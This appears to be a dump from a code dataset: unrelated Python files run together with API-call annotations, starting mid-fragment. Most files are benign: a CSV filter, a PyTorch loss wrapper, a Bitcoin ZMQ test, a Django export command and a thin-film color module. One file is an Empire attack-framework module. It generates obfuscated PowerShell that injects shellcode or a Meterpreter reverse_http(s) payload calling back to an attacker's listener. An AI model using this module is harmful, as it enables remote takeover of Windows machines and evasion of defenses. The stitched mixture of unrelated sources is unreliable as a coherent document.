False, 'from talentmap_api.language.models import Qualification\n')]
|
import csv
with open('TheCure_Discography.csv') as f:
f_csv = csv.reader(f, delimiter=';')
headers = next(f_csv)
for row in filter(
lambda l: "Fiction Records" in l[1] and 1980 <= int(l[2]) <= 1989,
f_csv
):
print(row)
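# An equivalent list-comprehension spelling, for comparison (a sketch; it
# assumes the same column layout as above: column 1 holds the record label,
# column 2 the release year):
#
#     eighties_fiction = [row for row in f_csv
#                         if "Fiction Records" in row[1]
#                         and 1980 <= int(row[2]) <= 1989]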
|
[
"csv.reader"
] |
[((66, 94), 'csv.reader', 'csv.reader', (['f'], {'delimiter': '""";"""'}), "(f, delimiter=';')\n", (76, 94), False, 'import csv\n')]
|
import torch
import torch.nn as nn
import misc.utils as utils
from misc.rewards import init_scorer, get_self_critical_reward
import torch.nn.functional as F
class LossWrapper(torch.nn.Module):
def __init__(self, model, opt):
super(LossWrapper, self).__init__()
self.opt = opt
self.model = model
if opt.label_smoothing > 0:
self.crit = utils.LabelSmoothing(smoothing=opt.label_smoothing)
else:
self.crit = utils.LanguageModelCriterion()
self.rl_crit = utils.RewardCriterion()
self.class_criterion = nn.BCELoss()
self.KL = nn.KLDivLoss(reduction='sum')
self.log_soft = nn.LogSoftmax()
def relation(self, input):
distance = []
input = input.reshape(10, 4, 80) # (b_s, augmentation, 80)
for tmp_input in input:
flag = tmp_input[0]
tmp_distance = []
for i in range(len(tmp_input)):
for tmp in tmp_input[i + 1:]:
tmp_distance.append(-torch.norm(flag - tmp))
distance.append(torch.stack(tmp_distance))
soft_dis = torch.nn.functional.softmax(torch.stack(distance))
return soft_dis
def forward(self, fc_feats, att_feats, labels, class_label, masks, att_masks, gts, gt_indices,
sc_flag):
out = {}
fc_feats = fc_feats.reshape(10, -1)
att_feats = att_feats.reshape(10, -1)
_, encoder_output, decoder_output = self.model(fc_feats, att_feats, labels, att_masks)
decoder_output = decoder_output.squeeze() # (b_s, 80)
# encoder_output, decoder_output: (b_s*per_image, 80)
if not sc_flag:
loss = self.crit(self.model(fc_feats, att_feats, labels, att_masks)[0], labels[:,1:], masks[:,1:])
            # label classification
img_loss = self.class_criterion(encoder_output, class_label)
cap_loss = self.class_criterion(decoder_output, class_label)
            # unlabeled classification
img_cls = encoder_output.masked_fill(encoder_output > 0.7, 1) # (b_s*per_image, 80)
img_cls = img_cls.masked_fill(img_cls <= 0.7, 0) # (b_s*per_image, 80)
unlabel_loss = self.class_criterion(decoder_output, img_cls)
            # relation and tau
decoder_output = decoder_output.masked_fill(decoder_output < 0.1, 0)
encoder_output = encoder_output.masked_fill(decoder_output < 0.1, 0)
img_kl = self.relation(encoder_output)
cap_kl = self.relation(decoder_output)
kl_loss = F.kl_div(cap_kl.log(), img_kl, reduction='sum')
print('img_loss: {}, cap_loss: {}, kl_loss: {}, unlabel_loss: {}'.format(img_loss.item(),
cap_loss.item(),
unlabel_loss.item(),
kl_loss.item()))
out['loss'] = loss + (img_loss + cap_loss) + kl_loss
else:
self.model.eval()
with torch.no_grad():
greedy_res, _ = self.model(fc_feats, att_feats, att_masks, mode='sample')
self.model.train()
gen_result, sample_logprobs = self.model(fc_feats, att_feats, att_masks, opt={'sample_method':'sample'}, mode='sample')
gts = [gts[_] for _ in gt_indices.tolist()]
reward = get_self_critical_reward(greedy_res, gts, gen_result, self.opt)
reward = torch.from_numpy(reward).float().to(gen_result.device)
loss = self.rl_crit(sample_logprobs, gen_result.data, reward)
out['reward'] = reward[:,0].mean()
out['loss'] = loss
return out
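# A minimal wiring sketch (hypothetical `model`/`opt` objects; tensor shapes
# follow the hard-coded layout above: batch of 10 images, 80 classes):
#
#     wrapper = LossWrapper(model, opt)
#     out = wrapper(fc_feats, att_feats, labels, class_label, masks,
#                   att_masks, gts, gt_indices, sc_flag=False)
#     out['loss'].backward()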
|
[
"torch.nn.BCELoss",
"torch.stack",
"torch.nn.LogSoftmax",
"misc.utils.LanguageModelCriterion",
"torch.nn.KLDivLoss",
"torch.norm",
"misc.rewards.get_self_critical_reward",
"misc.utils.LabelSmoothing",
"torch.no_grad",
"misc.utils.RewardCriterion",
"torch.from_numpy"
] |
[((529, 552), 'misc.utils.RewardCriterion', 'utils.RewardCriterion', ([], {}), '()\n', (550, 552), True, 'import misc.utils as utils\n'), ((585, 597), 'torch.nn.BCELoss', 'nn.BCELoss', ([], {}), '()\n', (595, 597), True, 'import torch.nn as nn\n'), ((616, 645), 'torch.nn.KLDivLoss', 'nn.KLDivLoss', ([], {'reduction': '"""sum"""'}), "(reduction='sum')\n", (628, 645), True, 'import torch.nn as nn\n'), ((670, 685), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {}), '()\n', (683, 685), True, 'import torch.nn as nn\n'), ((385, 436), 'misc.utils.LabelSmoothing', 'utils.LabelSmoothing', ([], {'smoothing': 'opt.label_smoothing'}), '(smoothing=opt.label_smoothing)\n', (405, 436), True, 'import misc.utils as utils\n'), ((475, 505), 'misc.utils.LanguageModelCriterion', 'utils.LanguageModelCriterion', ([], {}), '()\n', (503, 505), True, 'import misc.utils as utils\n'), ((1161, 1182), 'torch.stack', 'torch.stack', (['distance'], {}), '(distance)\n', (1172, 1182), False, 'import torch\n'), ((3522, 3585), 'misc.rewards.get_self_critical_reward', 'get_self_critical_reward', (['greedy_res', 'gts', 'gen_result', 'self.opt'], {}), '(greedy_res, gts, gen_result, self.opt)\n', (3546, 3585), False, 'from misc.rewards import init_scorer, get_self_critical_reward\n'), ((1086, 1111), 'torch.stack', 'torch.stack', (['tmp_distance'], {}), '(tmp_distance)\n', (1097, 1111), False, 'import torch\n'), ((3175, 3190), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3188, 3190), False, 'import torch\n'), ((1033, 1055), 'torch.norm', 'torch.norm', (['(flag - tmp)'], {}), '(flag - tmp)\n', (1043, 1055), False, 'import torch\n'), ((3607, 3631), 'torch.from_numpy', 'torch.from_numpy', (['reward'], {}), '(reward)\n', (3623, 3631), False, 'import torch\n')]
|
from __future__ import print_function
import pathlib
from builtins import object
from builtins import str
from typing import Dict
from empire.server.common import helpers
from empire.server.common.module_models import PydanticModule
from empire.server.utils import data_util
from empire.server.utils.module_util import handle_error_message
class Module(object):
@staticmethod
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-Shellcode.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = "\nInvoke-Shellcode -Force"
listener_name = params['Listener']
if listener_name != "":
if not main_menu.listeners.is_listener_valid(listener_name):
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# TODO: redo pulling these listener configs...
# Old method no longer working
# temporary fix until a more elegant solution is in place, unless this is the most elegant???? :)
# [ID,name,host,port,cert_path,staging_key,default_delay,default_jitter,default_profile,kill_date,working_hours,listener_type,redirect_target,default_lost_limit] = main_menu.listeners.get_listener(listener_name)
host = main_menu.listeners.loadedListeners['meterpreter'].options['Host']
port = main_menu.listeners.loadedListeners['meterpreter'].options['Port']
MSFpayload = "reverse_http"
if "https" in host:
MSFpayload += "s"
hostname = host.split(":")[1].strip("/")
params['Lhost'] = str(hostname)
params['Lport'] = str(port)
params['Payload'] = str(MSFpayload)
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "listener":
if values and values != '':
if option.lower() == "payload":
payload = "windows/meterpreter/" + str(values)
script_end += " -" + str(option) + " " + payload
elif option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values.split("\\"))[0:]
script_end += " -" + str(option) + " @(" + sc + ")"
elif option.lower() == "file":
with open(f"{main_menu.installPath}/downloads/{values}", 'rb') as bin_data:
shellcode_bin_data = bin_data.read()
sc = ''
for x in range(len(shellcode_bin_data)):
sc += "0x{:02x}".format(shellcode_bin_data[x]) + ','
script_end += f' -shellcode @({sc[:-1]})'
else:
script_end += " -" + str(option) + " " + str(values)
script_end += "; 'Shellcode injected.'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
|
[
"empire.server.utils.data_util.keyword_obfuscation",
"empire.server.utils.data_util.obfuscate",
"pathlib.Path",
"empire.server.utils.module_util.handle_error_message",
"builtins.str"
] |
[((4198, 4235), 'empire.server.utils.data_util.keyword_obfuscation', 'data_util.keyword_obfuscation', (['script'], {}), '(script)\n', (4227, 4235), False, 'from empire.server.utils import data_util\n'), ((1274, 1401), 'empire.server.utils.data_util.obfuscate', 'data_util.obfuscate', ([], {'installPath': 'main_menu.installPath', 'psScript': 'module_code', 'obfuscationCommand': 'main_menu.obfuscateCommand'}), '(installPath=main_menu.installPath, psScript=module_code,\n obfuscationCommand=main_menu.obfuscateCommand)\n', (1293, 1401), False, 'from empire.server.utils import data_util\n'), ((4041, 4155), 'empire.server.utils.data_util.obfuscate', 'data_util.obfuscate', (['main_menu.installPath'], {'psScript': 'script_end', 'obfuscationCommand': 'main_menu.obfuscateCommand'}), '(main_menu.installPath, psScript=script_end,\n obfuscationCommand=main_menu.obfuscateCommand)\n', (4060, 4155), False, 'from empire.server.utils import data_util\n'), ((1708, 1770), 'empire.server.utils.module_util.handle_error_message', 'handle_error_message', (["('[!] Invalid listener: ' + listener_name)"], {}), "('[!] Invalid listener: ' + listener_name)\n", (1728, 1770), False, 'from empire.server.utils.module_util import handle_error_message\n'), ((2632, 2645), 'builtins.str', 'str', (['hostname'], {}), '(hostname)\n', (2635, 2645), False, 'from builtins import str\n'), ((2680, 2689), 'builtins.str', 'str', (['port'], {}), '(port)\n', (2683, 2689), False, 'from builtins import str\n'), ((2726, 2741), 'builtins.str', 'str', (['MSFpayload'], {}), '(MSFpayload)\n', (2729, 2741), False, 'from builtins import str\n'), ((832, 870), 'pathlib.Path', 'pathlib.Path', (['obfuscated_module_source'], {}), '(obfuscated_module_source)\n', (844, 870), False, 'import pathlib\n'), ((1143, 1161), 'builtins.str', 'str', (['module_source'], {}), '(module_source)\n', (1146, 1161), False, 'from builtins import str\n'), ((1203, 1241), 'pathlib.Path', 'pathlib.Path', (['obfuscated_module_source'], {}), '(obfuscated_module_source)\n', (1215, 1241), False, 'import pathlib\n'), ((3019, 3030), 'builtins.str', 'str', (['values'], {}), '(values)\n', (3022, 3030), False, 'from builtins import str\n'), ((3076, 3087), 'builtins.str', 'str', (['option'], {}), '(option)\n', (3079, 3087), False, 'from builtins import str\n'), ((3922, 3933), 'builtins.str', 'str', (['values'], {}), '(values)\n', (3925, 3933), False, 'from builtins import str\n'), ((3340, 3351), 'builtins.str', 'str', (['option'], {}), '(option)\n', (3343, 3351), False, 'from builtins import str\n'), ((3902, 3913), 'builtins.str', 'str', (['option'], {}), '(option)\n', (3905, 3913), False, 'from builtins import str\n')]
|
#!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the ZMQ notification interface."""
import configparser
import os
import struct
from test_framework.test_framework import BitcoinTestFramework, SkipTest
from test_framework.mininode import CTransaction
from test_framework.util import (assert_equal,
bytes_to_hex_str,
hash256,
)
from io import BytesIO
class ZMQSubscriber:
def __init__(self, socket, topic):
self.sequence = 0
self.socket = socket
self.topic = topic
import zmq
self.socket.setsockopt(zmq.SUBSCRIBE, self.topic)
def receive(self):
topic, body, seq = self.socket.recv_multipart()
# Topic should match the subscriber topic.
assert_equal(topic, self.topic)
# Sequence should be incremental.
assert_equal(struct.unpack('<I', seq)[-1], self.sequence)
self.sequence += 1
return body
class ZMQTest (BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
def setup_nodes(self):
# Try to import python3-zmq. Skip this test if the import fails.
try:
import zmq
except ImportError:
raise SkipTest("python3-zmq module not available.")
# Check that bitcoin has been built with ZMQ enabled.
config = configparser.ConfigParser()
if not self.options.configfile:
self.options.configfile = os.path.abspath(os.path.join(os.path.dirname(__file__), "../config.ini"))
config.read_file(open(self.options.configfile))
if not config["components"].getboolean("ENABLE_ZMQ"):
raise SkipTest("catecoind has not been built with zmq enabled.")
# Initialize ZMQ context and socket.
# All messages are received in the same socket which means
# that this test fails if the publishing order changes.
# Note that the publishing order is not defined in the documentation and
# is subject to change.
address = "tcp://127.0.0.1:28332"
self.zmq_context = zmq.Context()
socket = self.zmq_context.socket(zmq.SUB)
socket.set(zmq.RCVTIMEO, 60000)
socket.connect(address)
# Subscribe to all available topics.
self.hashblock = ZMQSubscriber(socket, b"hashblock")
self.hashtx = ZMQSubscriber(socket, b"hashtx")
self.rawblock = ZMQSubscriber(socket, b"rawblock")
self.rawtx = ZMQSubscriber(socket, b"rawtx")
self.extra_args = [["-zmqpub%s=%s" % (sub.topic.decode(), address) for sub in [self.hashblock, self.hashtx, self.rawblock, self.rawtx]], []]
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
try:
self._zmq_test()
finally:
# Destroy the ZMQ context.
self.log.debug("Destroying ZMQ context")
self.zmq_context.destroy(linger=None)
def _zmq_test(self):
num_blocks = 5
self.log.info("Generate %(n)d blocks (and %(n)d coinbase txes)" % {"n": num_blocks})
genhashes = self.nodes[0].generate(num_blocks)
self.sync_all()
for x in range(num_blocks):
# Should receive the coinbase txid.
txid = self.hashtx.receive()
# Should receive the coinbase raw transaction.
hex = self.rawtx.receive()
tx = CTransaction()
tx.deserialize(BytesIO(hex))
tx.calc_sha256()
assert_equal(tx.hash, bytes_to_hex_str(txid))
# Should receive the generated block hash.
hash = bytes_to_hex_str(self.hashblock.receive())
assert_equal(genhashes[x], hash)
# The block should only have the coinbase txid.
assert_equal([bytes_to_hex_str(txid)], self.nodes[1].getblock(hash)["tx"])
# Should receive the generated raw block.
block = self.rawblock.receive()
assert_equal(genhashes[x], bytes_to_hex_str(hash256(block[:80])))
self.log.info("Wait for tx from second node")
payment_txid = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1.0)
self.sync_all()
# Should receive the broadcasted txid.
txid = self.hashtx.receive()
assert_equal(payment_txid, bytes_to_hex_str(txid))
# Should receive the broadcasted raw transaction.
hex = self.rawtx.receive()
assert_equal(payment_txid, bytes_to_hex_str(hash256(hex)))
if __name__ == '__main__':
ZMQTest().main()
|
[
"test_framework.test_framework.SkipTest",
"test_framework.mininode.CTransaction",
"test_framework.util.bytes_to_hex_str",
"io.BytesIO",
"test_framework.util.hash256",
"os.path.dirname",
"struct.unpack",
"configparser.ConfigParser",
"test_framework.util.assert_equal",
"zmq.Context"
] |
[((981, 1012), 'test_framework.util.assert_equal', 'assert_equal', (['topic', 'self.topic'], {}), '(topic, self.topic)\n', (993, 1012), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((1575, 1602), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (1600, 1602), False, 'import configparser\n'), ((2310, 2323), 'zmq.Context', 'zmq.Context', ([], {}), '()\n', (2321, 2323), False, 'import zmq\n'), ((1892, 1950), 'test_framework.test_framework.SkipTest', 'SkipTest', (['"""catecoind has not been built with zmq enabled."""'], {}), "('catecoind has not been built with zmq enabled.')\n", (1900, 1950), False, 'from test_framework.test_framework import BitcoinTestFramework, SkipTest\n'), ((3642, 3656), 'test_framework.mininode.CTransaction', 'CTransaction', ([], {}), '()\n', (3654, 3656), False, 'from test_framework.mininode import CTransaction\n'), ((3915, 3947), 'test_framework.util.assert_equal', 'assert_equal', (['genhashes[x]', 'hash'], {}), '(genhashes[x], hash)\n', (3927, 3947), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((4558, 4580), 'test_framework.util.bytes_to_hex_str', 'bytes_to_hex_str', (['txid'], {}), '(txid)\n', (4574, 4580), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((1076, 1100), 'struct.unpack', 'struct.unpack', (['"""<I"""', 'seq'], {}), "('<I', seq)\n", (1089, 1100), False, 'import struct\n'), ((1449, 1494), 'test_framework.test_framework.SkipTest', 'SkipTest', (['"""python3-zmq module not available."""'], {}), "('python3-zmq module not available.')\n", (1457, 1494), False, 'from test_framework.test_framework import BitcoinTestFramework, SkipTest\n'), ((3684, 3696), 'io.BytesIO', 'BytesIO', (['hex'], {}), '(hex)\n', (3691, 3696), False, 'from io import BytesIO\n'), ((3761, 3783), 'test_framework.util.bytes_to_hex_str', 'bytes_to_hex_str', (['txid'], {}), '(txid)\n', (3777, 3783), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((4728, 4740), 'test_framework.util.hash256', 'hash256', (['hex'], {}), '(hex)\n', (4735, 4740), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((1710, 1735), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1725, 1735), False, 'import os\n'), ((4034, 4056), 'test_framework.util.bytes_to_hex_str', 'bytes_to_hex_str', (['txid'], {}), '(txid)\n', (4050, 4056), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n'), ((4250, 4269), 'test_framework.util.hash256', 'hash256', (['block[:80]'], {}), '(block[:80])\n', (4257, 4269), False, 'from test_framework.util import assert_equal, bytes_to_hex_str, hash256\n')]
|
'''
Manage command to export intervention data for use by others.
Generates a CSV and JSON file with details for all interventions
documented in the database.
Takes an optional argument to specify the output directory. Otherwise,
files are created in the current directory.
'''
import codecs
from collections import OrderedDict
import csv
import json
import os.path
from derrida.books.management.commands import reference_data
from derrida.interventions.models import Intervention
class Command(reference_data.Command):
'''Export intervention data from the database as CSV and JSON'''
help = __doc__
# NOTE: extending reference_data manage command to inherit
# flatten_data method; there is more overlap and these scripts
# could probably be generalized further for re-use
#: fields for CSV output
csv_fields = [
'id', 'book id', 'book title', 'book type', 'page', 'tags', 'text content',
'text language', 'text language code', 'text translation',
'quote content', 'quote language', 'quote language code', 'annotator'
]
#: base filename, for CSV and JSON output
base_filename = 'interventions'
def add_arguments(self, parser):
parser.add_argument(
'-d', '--directory',
help='Specify the directory where files should be generated')
def handle(self, *args, **kwargs):
if kwargs['directory']:
self.base_filename = os.path.join(kwargs['directory'], self.base_filename)
# aggregate intervention data to be exported for use in generating
# CSV and JSON output
data = [self.intervention_data(intervention)
for intervention in Intervention.objects.all()]
# list of dictionaries can be output as is for JSON export
with open('{}.json'.format(self.base_filename), 'w') as jsonfile:
json.dump(data, jsonfile, indent=2)
# generate CSV export
with open('{}.csv'.format(self.base_filename), 'w') as csvfile:
# write utf-8 byte order mark at the beginning of the file
csvfile.write(codecs.BOM_UTF8.decode())
csvwriter = csv.DictWriter(csvfile, fieldnames=self.csv_fields)
csvwriter.writeheader()
for intervention in data:
csvwriter.writerow(self.flatten_dict(intervention))
def intervention_data(self, intervention):
'''Generate a dictionary of data to export for a single
        :class:`~derrida.interventions.models.Intervention` object'''
# NOTE: using OrderedDict to ensure JSON output follows logical
# order in Python < 3.6, where dict order is not guaranteed
data = OrderedDict([
('id', intervention.get_uri()),
# every intervention *should* be associated with a book,
# but possible that some are not
('book', OrderedDict([
('id', intervention.work_instance.get_uri() if intervention.work_instance else ''),
('title', intervention.work_instance.display_title() if intervention.work_instance else ''),
('type', intervention.work_instance.item_type if intervention.work_instance else '')
])),
# canvas object *should* have a label, but possible it does not
('page', intervention.canvas.label if intervention.canvas else ''),
('tags', [tag.name for tag in intervention.tags.all()])
])
# only include text and quote information if we have content
if intervention.text:
text_info = OrderedDict({
'content': intervention.text
})
if intervention.text_language:
text_info['language'] = intervention.text_language.name
text_info['language code'] = intervention.text_language.code
if intervention.text_translation:
text_info['translation'] = intervention.text_translation
data['text'] = text_info
if intervention.quote:
quote_info = OrderedDict({
'content': intervention.quote
})
if intervention.quote_language:
quote_info['language'] = intervention.quote_language.name
quote_info['language code'] = intervention.quote_language.code
data['quote'] = quote_info
if intervention.author:
data['annotator'] = intervention.author.authorized_name
return data
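# Invocation sketch -- the management command name comes from this module's
# filename, which is not shown here:
#
#     python manage.py <command_name> --directory /path/to/output
#
# which writes interventions.csv and interventions.json to that directory
# (or to the current directory when --directory is omitted).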
|
[
"json.dump",
"csv.DictWriter",
"derrida.interventions.models.Intervention.objects.all",
"collections.OrderedDict",
"codecs.BOM_UTF8.decode"
] |
[((1883, 1918), 'json.dump', 'json.dump', (['data', 'jsonfile'], {'indent': '(2)'}), '(data, jsonfile, indent=2)\n', (1892, 1918), False, 'import json\n'), ((2170, 2221), 'csv.DictWriter', 'csv.DictWriter', (['csvfile'], {'fieldnames': 'self.csv_fields'}), '(csvfile, fieldnames=self.csv_fields)\n', (2184, 2221), False, 'import csv\n'), ((3586, 3629), 'collections.OrderedDict', 'OrderedDict', (["{'content': intervention.text}"], {}), "({'content': intervention.text})\n", (3597, 3629), False, 'from collections import OrderedDict\n'), ((4066, 4110), 'collections.OrderedDict', 'OrderedDict', (["{'content': intervention.quote}"], {}), "({'content': intervention.quote})\n", (4077, 4110), False, 'from collections import OrderedDict\n'), ((1701, 1727), 'derrida.interventions.models.Intervention.objects.all', 'Intervention.objects.all', ([], {}), '()\n', (1725, 1727), False, 'from derrida.interventions.models import Intervention\n'), ((2119, 2143), 'codecs.BOM_UTF8.decode', 'codecs.BOM_UTF8.decode', ([], {}), '()\n', (2141, 2143), False, 'import codecs\n')]
|
# -*- coding: utf-8 -*-
"""
Functions to calculate the color of a multilayer thin film under reflected
light. A perfect mirror will look white, because we imagine seeing the white
light source ("illuminant") reflected in it. A half-reflective mirror will be
gray, a non-reflective surface will be black, etc. See tmm.examples.sample5()
for a few example calculations for how this is used.
For functions that require an illuminant, the most common choice would be to
use colorpy.illuminants.get_illuminant_D65(), which approximates a phase of
natural daylight. See http://en.wikipedia.org/wiki/Illuminant_D65 .
"""
from __future__ import division, print_function, absolute_import
from numpy import arange, array
import numpy as np
from .tmm_core import coh_tmm
try:
import colorpy
import colorpy.illuminants
import colorpy.ciexyz
except ImportError:
print('Warning: Colorpy not detected (or perhaps an error occurred when',
'loading it). Film color calculations (in tmm.color)',
'will not work. Main version is at http://pypi.python.org/pypi/colorpy',
'A Python 3 compatible edit is at https://github.com/fish2000/ColorPy/')
inf = float('inf')
def calc_reflectances(n_fn_list, d_list, th_0, pol='s', spectral_range='narrow'):
"""
Calculate the reflection spectrum of a thin-film stack.
n_fn_list[m] should be a function that inputs wavelength in nm and
outputs refractive index of the m'th layer. In other words,
    n_fn_list[2](456) == 1.53 + 0.4j means that layer #2 has a refractive index
of 1.53 + 0.4j at 456nm. These functions could be defined with
scipy.interpolate.interp1d() for example.
pol, d_list and th_0 are defined as in tmm.coh_tmm ... but d_list
MUST be in units of nanometers
spectral_range can be 'full' if all the functions in n_fn_list can take
wavelength arguments between 360-830nm; or 'narrow' if some or all require
arguments only in the range 400-700nm. The wavelengths outside the
'narrow' range make only a tiny difference to the color, because they are
almost invisible to the eye. If spectral_range is 'narrow', then the n(400)
values are used for 360-400 and n(700) for 700-830nm
Returns a 2-column array where the first column is wavelength in nm
(360,361,362,...,830) and the second column is reflectivity (from 0
to 1, where 1 is a perfect mirror). This range is chosen to be
consistent with colorpy.illuminants. See colorpy.ciexyz.start_wl_nm etc.
"""
lam_vac_list = arange(360, 831)
num_layers = len(n_fn_list)
def extend_spectral_range(n_fn):
"""
Starting with a narrow-spectrum refractive index function
n_fn(wavelength), create then return the corresponding full-spectrum
refractive index function
"""
def extended_n_fn(lam):
if lam < 400:
return n_fn(400)
elif lam > 700:
return n_fn(700)
else:
return n_fn(lam)
return extended_n_fn
if spectral_range == 'narrow':
n_fn_list = [extend_spectral_range(n_fn) for n_fn in n_fn_list]
final_answer = []
for lam_vac in lam_vac_list:
n_list = [n_fn_list[i](lam_vac) for i in range(num_layers)]
R = coh_tmm(pol, n_list, d_list, th_0, lam_vac)['R']
final_answer.append([lam_vac,R])
final_answer = array(final_answer)
return final_answer
def calc_spectrum(reflectances, illuminant):
"""
    * reflectances is the output of calc_reflectances()
* illuminant is a 2D numpy arrays, with one row for each wavelength,
with the first column holding the wavelength in nm, and the
second column the intensity. This is the form returned by the
functions in colorpy.illuminants. It is normally assumed that
illuminant is normalized so that Y=1.
"""
    #Both colorpy.illuminants and calc_reflectances should go from
#colorpy.ciexyz.start_wl_nm etc, so they should have matching
#wavelength specifications
if not np.all(reflectances[:,0] == illuminant[:,0]):
raise ValueError('Wavelength range is inconsistent...Both should be 360,361,...,830.\n'
+ 'reflectances[0]=' + str(reflectances[0]) + ', reflectances[-1]=' + str(reflectances[-1])
+ '\nilluminant[0]=' + str(illuminant[0]) + ', illuminant[-1]=' + str(reflectances[-1]))
final_answer = []
for i,lam in enumerate(reflectances[:,0]):
final_answer.append([lam, reflectances[i,1] * illuminant[i,1]])
return array(final_answer)
def calc_color(spectrum, scale=None, show_warnings=True):
"""
Calculate the color in various representations.
spectrum is the output of calc_spectrum.
scale is the scaling method. Possibilities are:
    * scale=None means don't scale. This is usually what you want, because
the illuminant should be pre-scaled in an appropriate way.
(Specifically, it's scaled to get Y=1 for a perfect reflector.)
* scale='Y1' means that the intensity is increased or decreased in
order to set Y (the luminance) to 1. So you can get white but not gray,
you can get orange but not brown, etc.
* scale=0.789 multiplies X,Y,Z by 0.789. Any number > 0 is OK.
Returns a dictionary with rgb, irgb, xy, xyY, and XYZ. Definitions:
* xy, xyY and XYZ are defined as in
http://en.wikipedia.org/wiki/CIE_1931_color_space
* rgb is the linear (i.e., proportional to intensity, not
gamma-corrected) version of sRGB.
* irgb is ready-to-display sRGB, i.e. it is clipped to the range 0-1,
and gamma-corrected, and rounded to three integers in the range 0-255.
(sRGB is the standard RGB used in modern displays and printers.)
"""
assert (scale is None or scale == 'Y1'
or (type(scale) is float and scale > 0))
XYZ = colorpy.ciexyz.xyz_from_spectrum(spectrum)
assert min(XYZ) >= 0
if scale == 'Y1' or type(scale) is float:
factor = (1.0 / XYZ[1] if scale == 'Y1' else scale)
XYZ[0] *= factor
XYZ[1] *= factor
XYZ[2] *= factor
X,Y,Z = XYZ
if show_warnings:
if Y > 1:
print('Warning: Oversaturated color! XYZ = ', XYZ)
xy = [X / (X + Y + Z), Y / (X + Y + Z)]
xyY = [xy[0], xy[1], Y]
rgb = colorpy.colormodels.rgb_from_xyz(XYZ)
irgb = colorpy.colormodels.irgb_from_rgb(rgb)
return {'xy':xy, 'xyY':xyY, 'XYZ':XYZ, 'rgb':rgb, 'irgb':irgb}
def plot_reflectances(reflectances, filename='temp_plot.png', title='Reflectance', ylabel='Fraction reflected'):
"""
Makes nice colored plot of reflectances. reflectances is the output of
calc_reflectances(...)
"""
colorpy.plots.spectrum_plot(reflectances, title, filename, ylabel=ylabel)
def plot_spectrum(spectrum, filename='temp_plot.png', title='Reflected light under illumination', ylabel='Intensity (a.u.)'):
"""
Makes nice colored plot of the reflected color spectrum you see under a
certain illuminant. spectrum is the output of
calc_spectrum(...)
"""
colorpy.plots.spectrum_plot(spectrum, title, filename, ylabel=ylabel)
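# End-to-end sketch of the intended pipeline (not the library's sample5();
# `n_fn_list`, `d_list` and `th_0` are hypothetical inputs, and colorpy must
# be importable):
#
#     illuminant = colorpy.illuminants.get_illuminant_D65()
#     reflectances = calc_reflectances(n_fn_list, d_list, th_0)
#     spectrum = calc_spectrum(reflectances, illuminant)
#     color = calc_color(spectrum)
#     print(color['irgb'])   # display-ready sRGB triple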
|
[
"colorpy.ciexyz.xyz_from_spectrum",
"numpy.all",
"colorpy.plots.spectrum_plot",
"numpy.array",
"numpy.arange",
"colorpy.colormodels.irgb_from_rgb",
"colorpy.colormodels.rgb_from_xyz"
] |
[((2541, 2557), 'numpy.arange', 'arange', (['(360)', '(831)'], {}), '(360, 831)\n', (2547, 2557), False, 'from numpy import arange, array\n'), ((3416, 3435), 'numpy.array', 'array', (['final_answer'], {}), '(final_answer)\n', (3421, 3435), False, 'from numpy import arange, array\n'), ((4564, 4583), 'numpy.array', 'array', (['final_answer'], {}), '(final_answer)\n', (4569, 4583), False, 'from numpy import arange, array\n'), ((5883, 5925), 'colorpy.ciexyz.xyz_from_spectrum', 'colorpy.ciexyz.xyz_from_spectrum', (['spectrum'], {}), '(spectrum)\n', (5915, 5925), False, 'import colorpy\n'), ((6333, 6370), 'colorpy.colormodels.rgb_from_xyz', 'colorpy.colormodels.rgb_from_xyz', (['XYZ'], {}), '(XYZ)\n', (6365, 6370), False, 'import colorpy\n'), ((6382, 6420), 'colorpy.colormodels.irgb_from_rgb', 'colorpy.colormodels.irgb_from_rgb', (['rgb'], {}), '(rgb)\n', (6415, 6420), False, 'import colorpy\n'), ((6724, 6797), 'colorpy.plots.spectrum_plot', 'colorpy.plots.spectrum_plot', (['reflectances', 'title', 'filename'], {'ylabel': 'ylabel'}), '(reflectances, title, filename, ylabel=ylabel)\n', (6751, 6797), False, 'import colorpy\n'), ((7094, 7163), 'colorpy.plots.spectrum_plot', 'colorpy.plots.spectrum_plot', (['spectrum', 'title', 'filename'], {'ylabel': 'ylabel'}), '(spectrum, title, filename, ylabel=ylabel)\n', (7121, 7163), False, 'import colorpy\n'), ((4072, 4118), 'numpy.all', 'np.all', (['(reflectances[:, 0] == illuminant[:, 0])'], {}), '(reflectances[:, 0] == illuminant[:, 0])\n', (4078, 4118), True, 'import 